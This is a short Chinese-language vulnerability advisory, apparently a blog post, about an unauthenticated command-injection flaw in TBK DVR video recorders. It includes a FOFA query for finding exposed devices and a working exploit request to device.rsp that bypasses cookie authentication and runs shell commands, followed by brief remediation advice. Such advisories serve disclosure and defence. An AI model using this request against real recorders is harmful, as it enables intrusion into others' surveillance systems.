TBKDVR硬盘录像机device.rsp命令执行漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

TBK DVR硬盘录像机 device.rsp 接口处存在命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞绕过cookie认证执行任意系统指令,写入后门文件,获取录像机shell权限。

漏洞再现

fofa:"Location: /login.rsp"
GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=uname%20-a;pwd;ls HTTP/1.1

Host: ip

Cookie: uid=1

修复建议

1、请联系厂商进行修复。 2、如非必要,禁止公网访问该系统。 3、设置白名单访问。

相关推荐
cdprinter19 分钟前
安全、高效、可靠的物理隔离网络安全专用设备———信刻光盘安全隔离与文件单向导入系统!
网络·安全·web安全
大新屋24 分钟前
MongoDB 分片集群把非分片集合转成分片集合
数据库·mongodb
Python代狂魔1 小时前
Redis
数据库·redis·python·缓存
6v6-博客1 小时前
P2P 远程桌面工具|免费开源内网穿透远程软件
运维·服务器
柠檬茶AL1 小时前
36 NoSQL 注入
数据库·nosql·postman
-XWB-1 小时前
PostgreSQL诊断系列(2/6):锁问题排查全攻略——揪出“阻塞元凶”
数据库·postgresql
XiaoMu_0012 小时前
【MongoDB与MySQL对比】
数据库
qq_441996052 小时前
SSH 反向隧道:快速解决服务器网络限制
服务器·网络·ssh
做科研的周师兄2 小时前
【机器学习入门】1.2 初识机器学习:从数据到智能的认知之旅
大数据·数据库·人工智能·python·机器学习·数据分析·机器人
政安晨3 小时前
Ubuntu 服务器无法 ping 通网站域名的问题解决备忘 ——通常与网络配置有关(DNS解析)
linux·运维·服务器·ubuntu·ping·esp32编译服务器·dns域名解析